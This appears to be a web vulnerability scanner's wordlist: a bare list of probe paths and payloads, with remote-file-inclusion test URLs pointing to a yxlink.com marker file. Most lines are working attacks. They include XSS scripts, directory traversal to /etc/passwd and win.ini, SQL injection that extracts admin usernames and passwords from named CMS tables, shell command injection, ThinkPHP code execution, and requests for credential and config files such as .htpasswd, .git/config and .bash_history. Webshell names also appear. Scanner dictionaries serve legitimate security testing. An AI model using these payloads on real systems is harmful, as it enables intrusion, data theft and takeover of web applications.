!
!!
!!!
!install
!test
%09Copy%20of%20
%0a%0a<script>alert(\x5C\x22Vulnerable\x5C\x22)</script>.jsp
%20
%20(copy)
%20-%20Copy
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%23
%24
%2F*~1.*%2Fx.aspx
%2Fooxx*~1.*%2Fx.aspx
%2b
%2e/
%2e/WEB-INF/web.xml
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f
%3f.jsp
%40
%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/hosts
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
%5c/
%7eadmin
%7eftp
%7eguest
%7elog
%7elogs
%7enobody
%7eroot
%7ewww
%c0%ae/WEB-INF/web.xml
%c0%ae/WEB-INF/web.xml%C0%80.jsp
&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
&z=\x22><script>alert(document.cookie)</script>&f=
'
*.*
-
.%252e/.%252e/.%252e/winnt/boot.ini
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini
./WEB-INF/web.xml
.DS_Store
.FBCIndex
.adm
.admin
.bash_history
.bash_profile
.bower.json
.bzr/README
.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
.git/config
.gitignore
.hg/requires
.histfile
.history
.htaccess
.htaccess.old
.htaccess.save
.htaccess~
.htpasswd
.idea/workspace.xml
.irb_history
.irbrc
.listing
.mysql_history
.nano_history
.passwd
.perf
.project
.psql_history
.pydevproject
.s3cfg
.sh_history
.sqlite_history
.ssh
.stats/
.stats/awstats.pl
.stats/index.html
.sublime-workspace
.subversion
.svn/entries
.svn::$INDEX_ALLOCATION/entries
.travis.yml
.user.ini
.viminfo
.zshrc
/
//
///vulnweb.com/%2e%2e
//933364%40
//etc/passwd
/3b7Hg2im.php
/;955040%40
/?913824%40
/Copy%20of%20WEB-INF/jboss-web.xml
/Copy%20of%20WEB-INF/web.xml
/DownloadFile?type=full&file=/index.jsp
/Register
/RegisterUser
/UserRegister
/UserRegistration
/WEB-INF%20(copy)/jboss-web.xml
/WEB-INF%20(copy)/web.xml
/WEB-INF%20-%20Copy/jboss-web.xml
/WEB-INF%20-%20Copy/web.xml
/WEB-INF/Copy%20of%20jboss-web.xml
/WEB-INF/Copy%20of%20web.xml
/WEB-INF/jboss-web.xml
/WEB-INF/jboss-web.xml%20(copy)
/WEB-INF/jboss-web.xml%20-%20Copy
/WEB-INF/jboss-web.xml.bak
/WEB-INF/jboss-web.xml_
/WEB-INF/jboss-web.xml~
/WEB-INF/web.xml
/WEB-INF/web.xml%20(copy)
/WEB-INF/web.xml%20-%20Copy
/WEB-INF/web.xml.bak
/WEB-INF/web.xml_
/WEB-INF/web.xml~
/WS_FTP.LOG
/\x22942727%40
/_mmServerScripts/MMHTTPDB.php
/abxaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaeada.php?a=<script>alert(32233333)</script>
/account/register
/adduser1.asp
/admin/adduser.asp
/admin/admin_login.php
/admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from%205u_Admin&id=1%20and%201=2%20UNION%20select%201%20from%205u_Admin
/admin/css/common.css
/bank.php?transactions='
/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/md5(333))))/**/order/**/by/**/'1-ask-commentlist.html
/comment.php?mode=Delete&sid=1&cid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
/conf.inc
/conf.php
/config.inc
/config.inc.php
/config.php
/configuration.inc
/configuration.php
/consolehelp/console-help.portal?_nfpb=true&_pageLabel=ConsoleHelpSearchPage&searchQuery=\x22><script>alert('DSECRG')</script>
/database.inc
/database.inc.php
/database.php
/db.inc
/db.php
/editsite.php?returnpath=http://www.yxlink.com/nvs_test.txt
/en-us/account/register
/en/account/register
/global.inc.php
/in.php?returnpath=http://www.yxlink.com/nvs_test.txt
/index.php
/index.php/Index/index/name/$%7B@phpinfo()%7D
/index.php/Index/index/name/$%7B@print%20md5(NVS_SERVER_TEST_THINKPHP)%7D
/index.php/component/users/?view=registration
/index.php/customer/account/create/
/index.php/module/aciton/param1/$%7B@phpinfo()%7D
/index.php/module/aciton/param1/$%7B@print%20md5(NVS_SERVER_TEST_THINKPHP)%7D
/index.php/register/
/index.php?_a=register
/index.php?action=register
/index.php?app=core&module=global&section=register
/index.php?route=account/register
/index.php?title=Special:UserLogin&returnto=Main+Page&type=signup
/job.php?job=download&url=\x22aHR0cDovL2ltZy5sdWtpbmcuY2MvcGhwMTY4L215c3FsX2NvbmZpZy5waHA=\x22
/join.php
/kindeditor/php/file_manager_json.php?path=/
/localconfig.inc
/localconfig.php
/member.php?action=register
/player.swf?playerready=alert(document.domain)&debug=function(){alert(document.domain)}
/plus/NVS_TEST.PHP
/profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
/register
/register.asp
/register.aspx
/register.cgi
/register.html
/register.jsp
/register.php?do=register
/registration
/registration.asp
/registration.aspx
/registration.cgi
/registration.html
/registration.jsp
/registration.php
/settings.inc
/settings.inc.php
/settings.php
/signup
/signup.asp
/signup.aspx
/signup.cgi
/signup.html
/signup.jsp
/signup.php
/signup/account
/user/register
/vulnweb.com
/vulnweb.com/%2e%2e
/wp-login.php?action=register
/ws_ftp.log
0
00
0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=http://www.yxlink.com/nvs_test.txt%EF%BC%9F
0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=http://www.yxlink.com/nvs_test.txt?
1
1.php
10
11
123flashchat.php?e107path=http://www.yxlink.com/nvs_test.txt
1923Turk-Grup.php
2
2.php
2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
2011
2011/CompVisualizeBig.asp?id=23%20union%20select%201,888888-1,3,4,5%20from%20admin
2012
2013
2014
22_ultimate/templates/header.php?mainpath=http://www.yxlink.com/nvs_test.txt
2fly_gift.php?pages=content&gameid=16%20and%201=2%20union%20select%201,2,3,4,concat(username,0x4E56535F54455354,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37%20from%20cdb_members
3
3.php
4
4.php
5
5.php
6
6.php
666%0a%0a<script>alert('Vulnerable');</script>666.jsp
666%0a%0a<script>alert(\x22asdf\x22);</script>666.jsp
6CQuiNTmte
6pV8An9pmo.html
7
7.php
8
8.php
80sec.php
9
9.php
9642717
<script>alert('Vulnerable')</script>
<script>alert('Vulnerable')</script>.aspx
<script>alert('Vulnerable')</script>.jsp
<script>alert('Vulnerable')</script>.shtm
<script>alert('Vulnerable')</script>.shtml
<script>alert('Vulnerable')</script>.stm
<script>alert('Vulnerable')</script>.thtml
<script>alert(111)</script>
?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://www.yxlink.com/nvs_test.txt+-n
?/home/explore/category?sort_type-hot__answer_count-1__day-1__topic_id-55)%20and%201=2%20union%20select%20concat%28(select%20concat(user_name,0x4E56535F544553545F474F,email,0x2D3E,password)%20from%20aws_users%20limit%200,1)%29%23
?__debugger__=yes&cmd=resource&f=debugger.js
?app=vote&controller=vote&action=total&contentid=1%20and%201=2%20union%20select%20concat(username,char(0x3d),password,0x7C,md5(333))%20from%20cmstop_member%20where%20userid=1;%23
?m=offer&s=offer_list&id=1004%20and%20(select%201%20from%20(select%20count(*),concat(md5(333),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
?page=../../../../../../../../../etc/passwd%00.jpg
?page=1
?page=admin/function_list&module_id=11'%20union%20select%201,MD5(0000111010101),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--
?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,md5(0000111010101),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/auth_user_md5--
?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,md5(333),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
?param=-1+UNION+SELECT+GROUP_CONCAT(table_name)+FROM+information_schema.tables
?param=cmd.exe
?question/ajaxsearch/%27%20UNION%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2Cconcat%28md5%28333%29%2Cchar%280x3d%29%2Cpassword%29%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%20from%20ask_user%23
?search=%3Cscript%3Ealert(1)%3C%2Fscript%3E
?search=<script>alert(1)</script>
?search==%00{.exec|cmd.exe%20/c%20echo>D:/test.txt%20310dcbbf4cce62f762a2aaa148d556bd.}
?search==%00{.load|D:\x5Ctest.txt.}
?ticket_title=&contact_name=&priority=&status=&action=index&query=true&module=HelpDesk&order_by=&sorder=ASC&viewname=0&button=Search&category=&date_crit=is&date=%27+UNION+SELECT+56%2CCONCAT%28md5(333)%2C+%22%3A%22%2C+user_password%29%2C+%22Open%22%2C%22Normal%22%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1+from+users+where+users.user_name+LIKE+%27
@NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
@NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
@NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
@NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
@NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
A-Blog/navigation/donation.php?navigation_start=http://www.yxlink.com/nvs_test.txt
A-Blog/navigation/latestnews.php?navigation_start=http://www.yxlink.com/nvs_test.txt?
A-Blog/navigation/links.php?navigation_start=http://www.yxlink.com/nvs_test.txt?
A-Blog/navigation/search.php?navigation_end=http://www.yxlink.com/nvs_test.txt?
A-Blog/sources/myaccount.php?open_box=http://www.yxlink.com/nvs_test.txt?
ACGVnews/header.php?PathNews=http://www.yxlink.com/nvs_test.txt
ADM:GETLOGFILE?PARAMS=<script>alert(\x22hello\x22)</script>
ADMIN
ASPWebPack.php
ASPXspy.php
ATutor/documentation/common/frame_toc.php?section=http://www.yxlink.com/nvs_test.txt
ATutor/documentation/common/search.php?section=http://www.yxlink.com/nvs_test.txt
ATutor/documentation/common/vitals.inc.php?req_lang=http://www.yxlink.com/nvs_test.txt
ATutor/include/classes/module/module.class.php?row[dir_name]=http://www.yxlink.com/nvs_test.txt
ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=http://www.yxlink.com/nvs_test.txt
Account/Register.aspx?ReturnUrl=
AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=http://www.yxlink.com/nvs_test.txt?
Admin
Admin/
Administration/Includes/configureText.php?path_prefix=http://www.yxlink.com/nvs_test.txt
Administration/Includes/contentHome.php?path_prefix=http://www.yxlink.com/nvs_test.txt
Administration/Includes/deleteContent.php?path_prefix=http://www.yxlink.com/nvs_test.txt
Administration/Includes/deleteUser.php?path_prefix=http://www.yxlink.com/nvs_test.txt
Administration/Includes/userHome.php?path_prefix=http://www.yxlink.com/nvs_test.txt
Administrator
Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=http://www.yxlink.com/nvs_test.txt?
Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=http://www.yxlink.com/nvs_test.txt?
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
AnalyticalReporting/querywizard/jsp/query.jsp?lang=\x22></script><script>alert(1)</script>
BE_config.php?_PSL[classdir]=http://www.yxlink.com/nvs_test.txt
BPNEWS/bn_smrep1.php?bnrep=http://www.yxlink.com/nvs_test.txt?&
Base/Application.php?pear_dir=http://www.yxlink.com/nvs_test.txt
Bcwb_PATH/dcontent/default.css.php?root_path_admin=http://www.yxlink.com/nvs_test.txt
Bcwb_PATH/include/startup.inc.php?root_path_admin=http://www.yxlink.com/nvs_test.txt
Bcwb_PATH/system/default.css.php?root_path_admin=http://www.yxlink.com/nvs_test.txt
Beautifier/Core.php?BEAUT_PATH=http://www.yxlink.com/nvs_test.txt?
BetaBlockModules//Module/Module.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/EditProfileModule/external.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/EnableModule/EnableModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/LinksModule/LinksModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/LogoModule/LogoModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/MessageModule/MessageModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/MyNetworksModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=http://www.yxlink.com/nvs_test.txt?admin
BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
CCMUser/logon.asp?lang=en'+union+select+md5(333);select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
CFIDE/administrator/index.cfm
CFIDE/componentutils/cfcexplorer.cfc
CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(222)%3E
CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(3444)%3E
CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E \x5Cr/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E
CFIDE/probe.cfm
CFIDE/scripts/ajax/FCKeditor
CHANGELOG
CHANGELOG.TXT
CHANGELOG.txt
CHANGES.html
CMD_REDIRECT?view=advanced&sort1%22%3E%3Cscript%3Ealert(111);%3C/script%3E=1&domain=demo.com
CMS
COM
COM/
CSLH2_path/txt-db-api/util.php?API_HOME_DIR=http://www.yxlink.com/nvs_test.txt?
CSNews.cgi?command=viewnews&database=none
CSV
CScgi/LogonProxy.cgi?Ok=<script>alert(2222)</script>
CScgi/LogonProxy.cgi?Server=0.0.0.0&error=<script>alert(222)</script>
CVS
CVS/Entries
CVS/Root
ChangeLog.txt
Changelog.txt
CheckUpload.php?Language=http://www.yxlink.com/nvs_test.txt
CheckUpload.php?Language=http://www.yxlink.com/nvs_test.txt&cmd=ls
Citrix/ICAWEB/
Citrix/MetaFrameXP/default/login.asp
Citrix/PNAgent/
ClientAccessPolicy.xml
Cnnsc.php
Config
Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=http://www.yxlink.com/nvs_test.txt?
CoupleDB.php?Parametre=0&DataDirectory=http://www.yxlink.com/nvs_test.txt?
CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
DB
DB4Web/10.10.10.10:100
DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=http://www.yxlink.com/nvs_test.txt
DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=http://www.yxlink.com/nvs_test.txt
DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=http://www.yxlink.com/nvs_test.txt
DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=http://www.yxlink.com/nvs_test.txt
DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=http://www.yxlink.com/nvs_test.txt
DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=http://www.yxlink.com/nvs_test.txt
DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=http://www.yxlink.com/nvs_test.txt
DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]http://www.yxlink.com/nvs_test.txt
DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=http://www.yxlink.com/nvs_test.txt
DON3/applications/frontpage.don3app/frontpage.php?app_path=http://www.yxlink.com/nvs_test.txt?
DarkBlade.php
Darkshell.php
Default
DesktopModules/EasyDNNRotator/flowplayer/flowplayer.swf?config=https://s3-us-west-2.amazonaws.com/bxss/fp.js
Dir_phNNTP/article-raw.php?file_newsportal=http://www.yxlink.com/nvs_test.txt?
Dockerfile
Download
Downloads
Dump.aspx
DynaTracker_v151/action.php?base_path=http://www.yxlink.com/nvs_test.txt
DynaTracker_v151/includes_handler.php?base_path=http://www.yxlink.com/nvs_test.txt
Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=http://www.yxlink.com/nvs_test.txt?
Estadisticas/
Ex/modules/threadstop/threadstop.php?exbb[home_path]=http://www.yxlink.com/nvs_test.txt?
Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=http://www.yxlink.com/nvs_test.txt?
Exchange
Exophpdesk_PATH/pipe.php?lang_file=http://www.yxlink.com/nvs_test.txt
FCK/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
FCKeditor
FCKeditor/editor/dialog/fck_flash.html
FCKeditor/editor/dialog/fck_image.html
FCKeditor/editor/dialog/fck_link.html
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FEcxlsO3
FileSeek.cgi?head=&foot=;cat%20/etc/passwd
FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
FirstPost/block.php?Include=http://www.yxlink.com/nvs_test.txt
Flex
Flex/history/historyFrame.html
Flickrclient.php?path_prefix=http://www.yxlink.com/nvs_test.txt
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
FormMail.cgi?<script>alert(\x5C\x22Vulnerable\x5C\x22);</script>
FormMail.pl
FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.yxlink.com/nvs_test.txt?
FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.yxlink.com/nvs_test.txt?
ForumTopicDetails.php?TopicID=-10%20union%20select%201,userid,md5(333),userid,joindate,4444444,4444444%20from%20ForumUser%20where%20user_index=1
Full_Release/include/body_comm.inc.php?content=http://www.yxlink.com/nvs_test.txt
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
GW5/GWWEB.EXE?HELP=bad-request
GWWEB.EXE?HELP=bad-request
Gallery/displayCategory.php?basepath=http://www.yxlink.com/nvs_test.txt
Gemfile
Gemfile.lock
Global.asa.bak
Global.asax.bak
Government/Resources/program/bbs/reg_upload.asp
Government/Resources/program/logon.asp
GruntFile.coffee
Gruntfile.coffee
Gruntfile.js
Guardfile
Guest/baike/Details.aspx?soure=manager&tittle=1'%0aand%2b(select%2bstr(123.4,8,4))>0--
Gulpfile.coffee
Gulpfile.js
Host/Portals/tabid/19/ctl/Login/portalid/0/Default.aspx
IBMWebAS/
IBMWebAS/apidocs/
IBMWebAS/configDocs/
IBMWebAS/docs/
IBMWebAS/mbeanDocs/
INSTALL
INSTALL.html
INSTALL.mysql.txt
INSTALL.pgsql.txt
INSTALL.txt
INSTALL_admin
ISSamples/SQLQHit.asp
ISSamples/sqlqhit.asp
Images
Include/Start.php?inc_path=http://www.yxlink.com/nvs_test.txt
Include/functions_folder.php?PATH_Includes=http://www.yxlink.com/nvs_test.txt
Include/functions_hacking.php?PATH_Includes=http://www.yxlink.com/nvs_test.txt&itemID=usershow
Include/functions_message.php?PATH_Includes=http://www.yxlink.com/nvs_test.txt
Include/lib.inc.php3?Include=http://www.yxlink.com/nvs_test.txt?
Include/lib.inc.php3?http://www.yxlink.com/nvs_test.txt
Include/variables.php3?Include=http://www.yxlink.com/nvs_test.txt?
Index
Install
Install.txt
JFolder.php
JUNK(10)
JUNK(10)abcd.html
JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//--
JUNK(223)<font%20size=50>DEFACED<!--//--
JUNK(5).csp
JUNK(5).xml
JUNK(5)/
JUNK(6).cfm?mode=debug
Jobline/admin.jobline.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
Jplayer.swf
Jsp.php
JspSpy.php
Judge.php
